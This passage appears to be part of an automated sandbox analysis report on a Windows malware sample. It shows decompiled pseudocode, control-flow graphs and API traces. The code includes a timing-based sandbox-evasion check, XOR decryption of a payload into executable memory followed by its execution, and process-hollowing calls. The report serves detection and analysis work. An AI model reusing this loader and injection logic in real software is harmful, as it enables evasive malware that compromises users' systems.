41328c 14467->14478 14475 41371a 14468->14475 14471 4135d0 14469->14471 14473 41328c _cvtdate 67 API calls 14471->14473 14473->14468 14474 41328c _cvtdate 67 API calls 14474->14468 14484 4058f2 LeaveCriticalSection 14475->14484 14477 413721 14477->14460 14479 4132ac 14478->14479 14480 412de5 __get_daylight 67 API calls 14479->14480 14482 4133ff 14479->14482 14481 413428 14480->14481 14481->14482 14483 402489 __invoke_watson 10 API calls 14481->14483 14482->14474 14483->14482 14484->14477 14528 4140f9 14531 414105 _signal _strnlen 14528->14531 14529 414113 14530 402673 _signal 67 API calls 14529->14530 14532 414118 14530->14532 14531->14529 14534 414147 14531->14534 14533 4025f0 _signal 6 API calls 14532->14533 14539 414128 _signal 14533->14539 14535 4059e4 __lock 67 API calls 14534->14535 14536 41414e 14535->14536 14537 413f39 __getenv_helper_nolock 122 API calls 14536->14537 14538 41415a 14537->14538 14541 414173 14538->14541 14544 4058f2 LeaveCriticalSection 14541->14544 14543 41417a 14543->14539 14544->14543 12615 404292 12616 404220 __encode_pointer 7 API calls 12615->12616 12617 404299 12616->12617

                                    Executed Functions

                                    Function 00401000 Relevance: 12.1, APIs: 8, Instructions: 84sleepmemoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    C-Code - Quality: 59%
                                    			E00401000(void* __ebx, void* __edi, void* __esi, intOrPtr _a12) {
				long _v16;
				signed int _v20;
				long _v24;
				intOrPtr _v28;
				char* _v32;
				long _v36;
				void* _v40;
				intOrPtr _v60;
				void* __ebp;
				intOrPtr _t42;
				long _t45;
				void* _t47;
				signed int _t58;

				_v40 = 0;
				_v20 = 0;
				_v36 = 0;
				_v32 = "248058040134";
				_v16 = GetTickCount();
				Sleep(0x2be); // executed
				_v24 = GetTickCount();
				if(_v24 - _v16 >= 0x2bc) {
					_t42 = E00401906(_a12, 0x41a010); // executed
					_v28 = _t42;
					_push(2);
					_push(0);
					_push(_v28); // executed
					E004017BB(__ebx, _v28, __edi, __esi, __eflags); // executed
					_push(_v28); // executed
					_t45 = E004016C3(__ebx, _v28, __edi, __esi, __eflags); // executed
					_v36 = _t45;
					_push(0);
					_push(0);
					_push(_v28); // executed
					E004017BB(__ebx, _v28, __edi, __esi, __eflags); // executed
					_t47 = VirtualAlloc(0, _v36, 0x3000, 0x40); // executed
					_v40 = _t47;
					E00401509(_v40, _v36, 1, _v28); // executed
					_v20 = 0;
					while(1) {
						__eflags = _v20 - _v36;
						if(_v20 >= _v36) {
							break;
						}
						asm("cdq");
						 *(_v40 + _v20) =  *(_v40 + _v20) & 0x000000ff ^ _v32[_v20 % 0xc] & 0x000000ff;
						_t58 = _v20 + 1;
						__eflags = _t58;
						_v20 = _t58;
					}
					_v40();
				} else {
				}
				return _v60;
			}
















                                    0x00401006
                                    0x0040100d
                                    0x00401014
                                    0x0040101b
                                    0x00401028
                                    0x00401030
                                    0x0040103c
                                    0x0040104a
                                    0x0040105a
                                    0x00401062
                                    0x00401065
                                    0x00401067
                                    0x0040106c
                                    0x0040106d
                                    0x00401078
                                    0x00401079
                                    0x00401081
                                    0x00401084
                                    0x00401086
                                    0x0040108b
                                    0x0040108c
                                    0x004010a1
                                    0x004010a7
                                    0x004010b8
                                    0x004010c0
                                    0x004010d2
                                    0x004010d5
                                    0x004010d8
                                    0x00000000
                                    0x00000000
                                    0x004010dd
                                    0x004010fd
                                    0x004010cc
                                    0x004010cc
                                    0x004010cf
                                    0x004010cf
                                    0x00401101
                                    0x00000000
                                    0x0040104c
                                    0x0040110a

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.984340288.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.984331709.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000006.00000002.984422449.0000000000416000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000006.00000002.984472203.000000000041A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_lyebkz.jbxd
                                    Similarity
                                    • API ID: CountTick_fseek$AllocSleepVirtual__fread_nolock_ftell
                                    • String ID:
                                    • API String ID: 4079035654-0
                                    • Opcode ID: 98302ffc4932b560a4fac1108cd9b2c892643303dcc53c9326f564c9fa85b315
                                    • Instruction ID: dcb3b119e74108e830e46b5cc3f63bc5bebb2f904d47d662a4372384efc9e28e
                                    • Opcode Fuzzy Hash: 98302ffc4932b560a4fac1108cd9b2c892643303dcc53c9326f564c9fa85b315
                                    • Instruction Fuzzy Hash: CE314EB0E002199FDB00DFA4DC56BFEBBB0BF48304F104529E611B7291D7799910CBA9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 002408B7 Relevance: 6.5, APIs: 4, Instructions: 483COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 264 2408b7-2409c0 call 24005f call 240838 call 240073 * 8 286 2409c7-2409d7 264->286 287 2409c2 264->287 290 2409de-240a01 CreateFileW 286->290 291 2409d9 286->291 288 240edc-240edf 287->288 292 240a03 290->292 293 240a08-240a2e VirtualAlloc ReadFile 290->293 291->288 292->288 294 240a35-240a48 293->294 295 240a30 293->295 297 240ec6-240ed5 call 24020a 294->297 298 240a4e-240ec1 294->298 295->288 301 240ed7-240ed9 ExitProcess 297->301
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.984097182.0000000000240000.00000040.00001000.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_240000_lyebkz.jbxd
                                    Similarity
                                    • API ID: AllocNumaVirtual
                                    • String ID:
                                    • API String ID: 4233825816-0
                                    • Opcode ID: a7c580f6139585de268896f1776a6c25d190ebef7fb1b5987543ec3ee5dd0687
                                    • Instruction ID: dc2ea24729b2d0253f69745f7ee40adb3dc5d4e0e8ebb1597773999a5f76cf06
                                    • Opcode Fuzzy Hash: a7c580f6139585de268896f1776a6c25d190ebef7fb1b5987543ec3ee5dd0687
                                    • Instruction Fuzzy Hash: 31227520D5D2D9ADDF06CBE984517FDBFB05E26201F0845C6E5E0B6283C13A839E9B25
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 002407DA Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 351 2407da-240820 call 24005f call 240073 GetSystemInfo 357 240822-240825 351->357 358 240829 351->358 359 24082b-24082e 357->359 358->359
                                    APIs
                                    • GetSystemInfo.KERNELBASE(?), ref: 002407F7
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.984097182.0000000000240000.00000040.00001000.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_240000_lyebkz.jbxd
                                    Similarity
                                    • API ID: InfoSystem
                                    • String ID:
                                    • API String ID: 31276548-0
                                    • Opcode ID: fa2979548fe31277adddc85b40786a5f89b5b758f8f4ce622a53a7dd496667a7
                                    • Instruction ID: 3719ef45d24630924a01786e39a02791583fbaae8522c1648bbb936b05ac5c8d
                                    • Opcode Fuzzy Hash: fa2979548fe31277adddc85b40786a5f89b5b758f8f4ce622a53a7dd496667a7
                                    • Instruction Fuzzy Hash: A1F0A771D2410CABDB0CEAB899856BE77ACDB48300F10457DE706E2141D534899046A0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00240EE0 Relevance: 10.7, APIs: 7, Instructions: 194filememoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 20 240ee0-240fb0 call 24005f call 240073 * 7 call 240109 CreateFileW 39 240fb6-240fc1 20->39 40 24108f 20->40 39->40 45 240fc7-240fd7 VirtualAlloc 39->45 41 241091-241096 40->41 42 24109c-2410a1 41->42 43 241098 41->43 49 2410bd-2410c0 42->49 43->42 45->40 47 240fdd-240fec ReadFile 45->47 47->40 48 240ff2-241011 VirtualAlloc 47->48 50 241013-241026 call 2400da 48->50 51 24108b-24108d 48->51 52 2410c2-2410c7 49->52 53 2410a3-2410a7 49->53 62 241061-241071 call 240073 50->62 63 241028-241033 50->63 51->41 57 2410d4-2410dc 52->57 58 2410c9-2410d1 VirtualFree 52->58 55 2410b3-2410b5 53->55 56 2410a9-2410b1 53->56 60 2410b7-2410ba 55->60 61 2410bc 55->61 56->49 58->57 60->49 61->49 62->41 69 241073-241078 62->69 64 241036-24105f call 2400da 63->64 64->62 70 24107e-241089 VirtualFree 69->70 71 24107a-24107b CloseHandle 69->71 70->49 71->70
                                    APIs
                                    • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,?,?,?,?,00241776,7FAB7E30), ref: 00240FA6
                                    • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,00241776,7FAB7E30,00241434,00000000,00000040), ref: 00240FD0
                                    • ReadFile.KERNELBASE(00000000,00000000,0000000E,7FAB7E30,00000000,?,?,?,?,?,?,?,00241776,7FAB7E30,00241434,00000000), ref: 00240FE7
                                    • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,00241776,7FAB7E30,00241434,00000000,00000040), ref: 00241009
                                    • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,00241776,7FAB7E30,00241434,00000000,00000040,?,00000000,0000000E), ref: 0024107B
                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,00241776,7FAB7E30,00241434,00000000,00000040,?), ref: 00241086
                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,00241776,7FAB7E30,00241434,00000000,00000040,?), ref: 002410D1
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.984097182.0000000000240000.00000040.00001000.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_240000_lyebkz.jbxd
                                    Similarity
                                    • API ID: Virtual$AllocFileFree$CloseCreateHandleRead
                                    • String ID:
                                    • API String ID: 721982790-0
                                    • Opcode ID: 4f748daaf124b4c23be61dd2c31c97865e232b5f77f10be233182db2a86c22fb
                                    • Instruction ID: d200a6134b1e57d90ae77681a8f3560dcf475280ecfe2ae99c6fd92613bbbf6d
                                    • Opcode Fuzzy Hash: 4f748daaf124b4c23be61dd2c31c97865e232b5f77f10be233182db2a86c22fb
                                    • Instruction Fuzzy Hash: 1351BF71E20359BBDB249FF4CC84BAEB7B8AF08710F105525FA50F7281E77599A08B64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040124C Relevance: 10.7, APIs: 7, Instructions: 189COMMONLIBRARYCODE
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 72 40124c-401268 73 40126a-40126d 72->73 74 40128b 72->74 73->74 76 40126f-401271 73->76 75 40128d-401291 74->75 77 401292-401297 76->77 78 401273-401282 call 402673 76->78 79 4012a6-4012a9 77->79 80 401299-4012a4 77->80 86 401283-401288 call 4025f0 78->86 83 4012b6-4012b8 79->83 84 4012ab-4012b3 call 402400 79->84 80->79 82 4012c7-4012da 80->82 89 4012e4 82->89 90 4012dc-4012e2 82->90 83->78 88 4012ba-4012c5 83->88 84->83 86->74 88->78 88->82 91 4012eb-4012ed 89->91 90->91 94 4012f3-4012fa 91->94 95 4013dd-4013e0 91->95 97 401340-401343 94->97 98 4012fc-401301 94->98 95->75 100 401345-401349 97->100 101 4013ad-4013ae call 401b67 97->101 98->97 99 401303 98->99 102 401309-40130d 99->102 103 40143e 99->103 105 40136a-401371 100->105 106 40134b-401354 100->106 112 4013b3-4013b7 101->112 110 401311-401314 102->110 111 40130f 102->111 107 401442-40144b 103->107 108 401373 105->108 109 401375-401378 105->109 113 401356-40135d 106->113 114 40135f-401364 106->114 107->75 108->109 115 401411-401415 109->115 116 40137e-40138a call 402351 call 402254 109->116 117 4013e5-4013eb 110->117 118 40131a-40133b call 402383 110->118 111->110 112->107 119 4013bd-4013c1 112->119 120 401366-401368 113->120 114->120 125 401427-401439 call 402673 115->125 126 401417-401424 call 402400 115->126 140 40138f-401394 116->140 121 4013fc-40140c call 402673 117->121 122 4013ed-4013f9 call 402400 117->122 134 4013d5-4013d7 118->134 119->115 127 4013c3-4013d2 119->127 120->109 121->86 122->121 125->86 126->125 127->134 134->94 134->95 141 401450-401454 140->141 142 40139a-40139d 140->142 141->107 142->103 143 4013a3-4013ab 142->143 143->134
                                    C-Code - Quality: 85%
                                    			E0040124C(signed int __edx, char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				signed int _v8;
				char* _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t90;
				intOrPtr* _t92;
				signed int _t94;
				char _t97;
				signed int _t105;
				void* _t106;
				signed int _t107;
				signed int _t110;
				signed int _t113;
				intOrPtr* _t114;
				signed int _t118;
				signed int _t119;
				signed int _t120;
				char* _t121;
				signed int _t125;
				signed int _t131;
				signed int _t133;
				void* _t134;

				_t125 = __edx;
				_t121 = _a4;
				_t119 = _a8;
				_t131 = 0;
				_v12 = _t121;
				_v8 = _t119;
				if(_a12 == 0 || _a16 == 0) {
					L5:
					return 0;
				} else {
					_t138 = _t121;
					if(_t121 != 0) {
						_t133 = _a20;
						__eflags = _t133;
						if(_t133 == 0) {
							L9:
							__eflags = _t119 - 0xffffffff;
							if(_t119 != 0xffffffff) {
								_t90 = E00402400(_t131, _t121, _t131, _t119);
								_t134 = _t134 + 0xc;
							}
							__eflags = _t133 - _t131;
							if(__eflags == 0) {
								goto L3;
							} else {
								_t94 = _t90 | 0xffffffff;
								_t125 = _t94 % _a12;
								__eflags = _a16 - _t94 / _a12;
								if(__eflags > 0) {
									goto L3;
								}
								L13:
								_t131 = _a12 * _a16;
								__eflags =  *(_t133 + 0xc) & 0x0000010c;
								_v20 = _t131;
								_t120 = _t131;
								if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
									_v16 = 0x1000;
								} else {
									_v16 =  *((intOrPtr*)(_t133 + 0x18));
								}
								__eflags = _t131;
								if(_t131 == 0) {
									L40:
									return _a16;
								} else {
									do {
										__eflags =  *(_t133 + 0xc) & 0x0000010c;
										if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
											L24:
											__eflags = _t120 - _v16;
											if(_t120 < _v16) {
												_t97 = E00401B67(_t120, _t125, _t133); // executed
												__eflags = _t97 - 0xffffffff;
												if(_t97 == 0xffffffff) {
													L48:
													return (_t131 - _t120) / _a12;
												}
												__eflags = _v8;
												if(_v8 == 0) {
													L44:
													__eflags = _a8 - 0xffffffff;
													if(__eflags != 0) {
														E00402400(_t131, _a4, 0, _a8);
														_t134 = _t134 + 0xc;
													}
													 *((intOrPtr*)(E00402673(__eflags))) = 0x22;
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													L4:
													E004025F0(_t125, _t131, _t133);
													goto L5;
												}
												_t123 = _v12;
												_v12 = _v12 + 1;
												 *_v12 = _t97;
												_t120 = _t120 - 1;
												_t70 =  &_v8;
												 *_t70 = _v8 - 1;
												__eflags =  *_t70;
												_v16 =  *((intOrPtr*)(_t133 + 0x18));
												goto L39;
											}
											__eflags = _v16;
											if(_v16 == 0) {
												_t105 = 0x7fffffff;
												__eflags = _t120 - 0x7fffffff;
												if(_t120 <= 0x7fffffff) {
													_t105 = _t120;
												}
											} else {
												__eflags = _t120 - 0x7fffffff;
												if(_t120 <= 0x7fffffff) {
													_t55 = _t120 % _v16;
													__eflags = _t55;
													_t125 = _t55;
													_t110 = _t120;
												} else {
													_t125 = 0x7fffffff % _v16;
													_t110 = 0x7fffffff;
												}
												_t105 = _t110 - _t125;
											}
											__eflags = _t105 - _v8;
											if(_t105 > _v8) {
												goto L44;
											} else {
												_push(_t105);
												_push(_v12);
												_t106 = E00402351(_t133);
												_pop(_t123);
												_push(_t106); // executed
												_t107 = E00402254(_t120, _t125, _t131, _t133, __eflags); // executed
												_t134 = _t134 + 0xc;
												__eflags = _t107;
												if(_t107 == 0) {
													 *(_t133 + 0xc) =  *(_t133 + 0xc) | 0x00000010;
													goto L48;
												}
												__eflags = _t107 - 0xffffffff;
												if(_t107 == 0xffffffff) {
													L47:
													_t80 = _t133 + 0xc;
													 *_t80 =  *(_t133 + 0xc) | 0x00000020;
													__eflags =  *_t80;
													goto L48;
												}
												_v12 = _v12 + _t107;
												_t120 = _t120 - _t107;
												_v8 = _v8 - _t107;
												goto L39;
											}
										}
										_t113 =  *(_t133 + 4);
										__eflags = _t113;
										if(__eflags == 0) {
											goto L24;
										}
										if(__eflags < 0) {
											goto L47;
										}
										_t131 = _t120;
										__eflags = _t120 - _t113;
										if(_t120 >= _t113) {
											_t131 = _t113;
										}
										__eflags = _t131 - _v8;
										if(_t131 > _v8) {
											_t133 = 0;
											__eflags = _a8 - 0xffffffff;
											if(__eflags != 0) {
												E00402400(_t131, _a4, 0, _a8);
												_t134 = _t134 + 0xc;
											}
											_t114 = E00402673(__eflags);
											_push(_t133);
											_push(_t133);
											_push(_t133);
											_push(_t133);
											 *_t114 = 0x22;
											_push(_t133);
											goto L4;
										} else {
											E00402383(_t120, _t123, _v12, _v8,  *_t133, _t131);
											 *(_t133 + 4) =  *(_t133 + 4) - _t131;
											 *_t133 =  *_t133 + _t131;
											_v12 = _v12 + _t131;
											_t120 = _t120 - _t131;
											_t134 = _t134 + 0x10;
											_v8 = _v8 - _t131;
											_t131 = _v20;
										}
										L39:
										__eflags = _t120;
									} while (_t120 != 0);
									goto L40;
								}
							}
						}
						_t118 = _t90 | 0xffffffff;
						_t90 = _t118 / _a12;
						_t125 = _t118 % _a12;
						__eflags = _a16 - _t90;
						if(_a16 <= _t90) {
							goto L13;
						}
						goto L9;
					}
					L3:
					_t92 = E00402673(_t138);
					_push(_t131);
					_push(_t131);
					_push(_t131);
					_push(_t131);
					 *_t92 = 0x16;
					_push(_t131);
					goto L4;
				}
			}





























                                    0x0040124c
                                    0x00401254
                                    0x00401258
                                    0x0040125d
                                    0x0040125f
                                    0x00401262
                                    0x00401268
                                    0x0040128b
                                    0x00000000
                                    0x0040126f
                                    0x0040126f
                                    0x00401271
                                    0x00401292
                                    0x00401295
                                    0x00401297
                                    0x004012a6
                                    0x004012a6
                                    0x004012a9
                                    0x004012ae
                                    0x004012b3
                                    0x004012b3
                                    0x004012b6
                                    0x004012b8
                                    0x00000000
                                    0x004012ba
                                    0x004012ba
                                    0x004012bf
                                    0x004012c2
                                    0x004012c5
                                    0x00000000
                                    0x00000000
                                    0x004012c7
                                    0x004012ca
                                    0x004012ce
                                    0x004012d5
                                    0x004012d8
                                    0x004012da
                                    0x004012e4
                                    0x004012dc
                                    0x004012df
                                    0x004012df
                                    0x004012eb
                                    0x004012ed
                                    0x004013dd
                                    0x00000000
                                    0x004012f3
                                    0x004012f3
                                    0x004012f3
                                    0x004012fa
                                    0x00401340
                                    0x00401340
                                    0x00401343
                                    0x004013ae
                                    0x004013b4
                                    0x004013b7
                                    0x00401442
                                    0x00000000
                                    0x00401448
                                    0x004013bd
                                    0x004013c1
                                    0x00401411
                                    0x00401411
                                    0x00401415
                                    0x0040141f
                                    0x00401424
                                    0x00401424
                                    0x0040142c
                                    0x00401434
                                    0x00401435
                                    0x00401436
                                    0x00401437
                                    0x00401438
                                    0x00401283
                                    0x00401283
                                    0x00000000
                                    0x00401288
                                    0x004013c3
                                    0x004013c6
                                    0x004013c9
                                    0x004013ce
                                    0x004013cf
                                    0x004013cf
                                    0x004013cf
                                    0x004013d2
                                    0x00000000
                                    0x004013d2
                                    0x00401345
                                    0x00401349
                                    0x0040136a
                                    0x0040136f
                                    0x00401371
                                    0x00401373
                                    0x00401373
                                    0x0040134b
                                    0x00401352
                                    0x00401354
                                    0x00401361
                                    0x00401361
                                    0x00401361
                                    0x00401364
                                    0x00401356
                                    0x00401358
                                    0x0040135b
                                    0x0040135b
                                    0x00401366
                                    0x00401366
                                    0x00401375
                                    0x00401378
                                    0x00000000
                                    0x0040137e
                                    0x0040137e
                                    0x0040137f
                                    0x00401383
                                    0x00401388
                                    0x00401389
                                    0x0040138a
                                    0x0040138f
                                    0x00401392
                                    0x00401394
                                    0x00401450
                                    0x00000000
                                    0x00401450
                                    0x0040139a
                                    0x0040139d
                                    0x0040143e
                                    0x0040143e
                                    0x0040143e
                                    0x0040143e
                                    0x00000000
                                    0x0040143e
                                    0x004013a3
                                    0x004013a6
                                    0x004013a8
                                    0x00000000
                                    0x004013a8
                                    0x00401378
                                    0x004012fc
                                    0x004012ff
                                    0x00401301
                                    0x00000000
                                    0x00000000
                                    0x00401303
                                    0x00000000
                                    0x00000000
                                    0x00401309
                                    0x0040130b
                                    0x0040130d
                                    0x0040130f
                                    0x0040130f
                                    0x00401311
                                    0x00401314
                                    0x004013e5
                                    0x004013e7
                                    0x004013eb
                                    0x004013f4
                                    0x004013f9
                                    0x004013f9
                                    0x004013fc
                                    0x00401401
                                    0x00401402
                                    0x00401403
                                    0x00401404
                                    0x00401405
                                    0x0040140b
                                    0x00000000
                                    0x0040131a
                                    0x00401323
                                    0x00401328
                                    0x0040132b
                                    0x0040132d
                                    0x00401330
                                    0x00401332
                                    0x00401335
                                    0x00401338
                                    0x00401338
                                    0x004013d5
                                    0x004013d5
                                    0x004013d5
                                    0x00000000
                                    0x004012f3
                                    0x004012ed
                                    0x004012b8
                                    0x00401299
                                    0x0040129e
                                    0x0040129e
                                    0x004012a1
                                    0x004012a4
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x004012a4
                                    0x00401273
                                    0x00401273
                                    0x00401278
                                    0x00401279
                                    0x0040127a
                                    0x0040127b
                                    0x0040127c
                                    0x00401282
                                    0x00000000
                                    0x00401282

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.984340288.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.984331709.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000006.00000002.984422449.0000000000416000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000006.00000002.984472203.000000000041A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_lyebkz.jbxd
                                    Similarity
                                    • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                    • String ID:
                                    • API String ID: 3886058894-0
                                    • Opcode ID: 1f920ff64106321d872a89d0e57180a9d742bd23c060d21717def355dd44e1d9
                                    • Instruction ID: 240a48f27fb2ceda56e5880fa4bc95f710285b37a359f38d2fc1df0738a507d3
                                    • Opcode Fuzzy Hash: 1f920ff64106321d872a89d0e57180a9d742bd23c060d21717def355dd44e1d9
                                    • Instruction Fuzzy Hash: FF51B431900204EBDB209FB9884899FBBB5EF41324F14867FF825B22F1D7789A51DB59
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0024020A Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 425COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 144 24020a-240225 call 24005f 147 240228-24022c 144->147 148 240244-240251 147->148 149 24022e-240242 147->149 150 240254-240258 148->150 149->147 151 240270-24027d 150->151 152 24025a-24026e 150->152 153 240280-240284 151->153 152->150 154 240286-24029a 153->154 155 24029c-24037a call 240073 * 8 153->155 154->153 172 240391 155->172 173 24037c-240386 155->173 175 240395-2403b1 172->175 173->172 174 240388-24038f 173->174 174->175 177 2403b3-2403b5 175->177 178 2403ba 175->178 179 240734-240737 177->179 180 2403c1-2403e9 CreateProcessW 178->180 181 2403f0-240409 180->181 182 2403eb 180->182 187 240410-24042d ReadProcessMemory 181->187 188 24040b 181->188 183 2406e8-2406ec 182->183 185 240731-240733 183->185 186 2406ee-2406f2 183->186 185->179 189 2406f4-2406ff 186->189 190 240705-240709 186->190 191 240434-24043d 187->191 192 24042f 187->192 188->183 189->190 193 240711-240715 190->193 194 24070b 190->194 197 240464-240483 call 241326 191->197 198 24043f-24044e 191->198 192->183 195 240717 193->195 196 24071d-240721 193->196 194->193 195->196 200 240723-240728 call 241291 196->200 201 24072d-24072f 196->201 208 240485 197->208 209 24048a-2404ab call 241440 197->209 198->197 202 240450-240456 call 241291 198->202 200->201 201->179 207 24045b-24045d 202->207 207->197 211 24045f 207->211 208->183 213 2404f0-240510 call 241440 209->213 214 2404ad-2404b4 209->214 211->183 221 240517-24052c call 2400da 213->221 222 240512 213->222 215 2404b6-2404e2 call 241440 214->215 216 2404eb 214->216 223 2404e4 215->223 224 2404e9 215->224 216->183 227 240535-24053f 221->227 222->183 223->183 224->213 228 240571-240575 227->228 229 240541-24056f call 2400da 227->229 231 240655-240671 call 2410df 228->231 232 24057b-240589 228->232 229->227 239 240675-240696 Wow64SetThreadContext 231->239 240 240673 231->240 232->231 235 24058f-24059d 232->235 235->231 238 2405a3-2405c3 235->238 241 2405c6-2405ca 238->241 242 240698 239->242 243 24069a-2406a4 call 2411e0 239->243 240->183 241->231 244 2405d0-2405e5 241->244 242->183 250 2406a6 243->250 251 2406a8-2406ac 243->251 246 2405f7-2405fb 244->246 248 2405fd-240609 246->248 249 240638-240650 246->249 252 240636 248->252 253 24060b-240634 248->253 249->241 250->183 255 2406b4-2406b8 251->255 256 2406ae 251->256 252->246 253->252 257 2406c0-2406c4 255->257 258 2406ba 255->258 256->255 259 2406c6 257->259 260 2406cc-2406d0 257->260 258->257 259->260 261 2406d2-2406d7 call 241291 260->261 262 2406dc-2406e2 260->262 261->262 262->180 262->183
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.984097182.0000000000240000.00000040.00001000.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_240000_lyebkz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: D
                                    • API String ID: 0-2746444292
                                    • Opcode ID: 172ff3dfdd571e89904787d956feae1d1adadd002cfcffde003cf902ebcfb7fd
                                    • Instruction ID: 7dd8d840171729cb0db0ca7765791b5ff3c9c3399b6b90ea13f77691315ba165
                                    • Opcode Fuzzy Hash: 172ff3dfdd571e89904787d956feae1d1adadd002cfcffde003cf902ebcfb7fd
                                    • Instruction Fuzzy Hash: B102E470E20209EFDF18DF94C985BADBBB5BF04305F204069E615BA291D7B4AEA0DF54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00401473 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 302 401473-401487 call 402914 305 4014c0 302->305 306 401489-40148c 302->306 307 4014c2-4014c7 call 402959 305->307 306->305 308 40148e-401491 306->308 310 401493-401497 308->310 311 4014c8-4014e3 call 402833 call 40124c 308->311 314 4014a8-4014bd call 402673 call 4025f0 310->314 315 401499-4014a5 call 402400 310->315 323 4014e8-4014fd call 4014ff 311->323 314->305 315->314 323->307
                                    C-Code - Quality: 70%
                                    			E00401473(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t19;
				intOrPtr _t22;
				void* _t33;
				void* _t34;

				_t30 = __edi;
				_t29 = __edx;
				_push(0xc);
				_push(0x417d10);
				E00402914(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t33 - 0x1c)) = 0;
				if( *((intOrPtr*)(_t33 + 0x10)) == 0 ||  *((intOrPtr*)(_t33 + 0x14)) == 0) {
					L6:
					_t19 = 0;
				} else {
					if( *((intOrPtr*)(_t33 + 0x18)) != 0) {
						E00402833( *((intOrPtr*)(_t33 + 0x18)));
						 *((intOrPtr*)(_t33 - 4)) = 0;
						_t22 = E0040124C(__edx,  *((intOrPtr*)(_t33 + 8)),  *((intOrPtr*)(_t33 + 0xc)),  *((intOrPtr*)(_t33 + 0x10)),  *((intOrPtr*)(_t33 + 0x14)),  *((intOrPtr*)(_t33 + 0x18))); // executed
						 *((intOrPtr*)(_t33 - 0x1c)) = _t22;
						 *((intOrPtr*)(_t33 - 4)) = 0xfffffffe;
						E004014FF();
						_t19 =  *((intOrPtr*)(_t33 - 0x1c));
					} else {
						_t41 =  *((intOrPtr*)(_t33 + 0xc)) - 0xffffffff;
						if( *((intOrPtr*)(_t33 + 0xc)) != 0xffffffff) {
							E00402400(__edi,  *((intOrPtr*)(_t33 + 8)), 0,  *((intOrPtr*)(_t33 + 0xc)));
							_t34 = _t34 + 0xc;
						}
						 *((intOrPtr*)(E00402673(_t41))) = 0x16;
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E004025F0(_t29, _t30, 0);
						goto L6;
					}
				}
				return E00402959(_t19);
			}







                                    0x00401473
                                    0x00401473
                                    0x00401473
                                    0x00401475
                                    0x0040147a
                                    0x00401481
                                    0x00401487
                                    0x004014c0
                                    0x004014c0
                                    0x0040148e
                                    0x00401491
                                    0x004014cb
                                    0x004014d1
                                    0x004014e3
                                    0x004014eb
                                    0x004014ee
                                    0x004014f5
                                    0x004014fa
                                    0x00401493
                                    0x00401493
                                    0x00401497
                                    0x004014a0
                                    0x004014a5
                                    0x004014a5
                                    0x004014ad
                                    0x004014b3
                                    0x004014b4
                                    0x004014b5
                                    0x004014b6
                                    0x004014b7
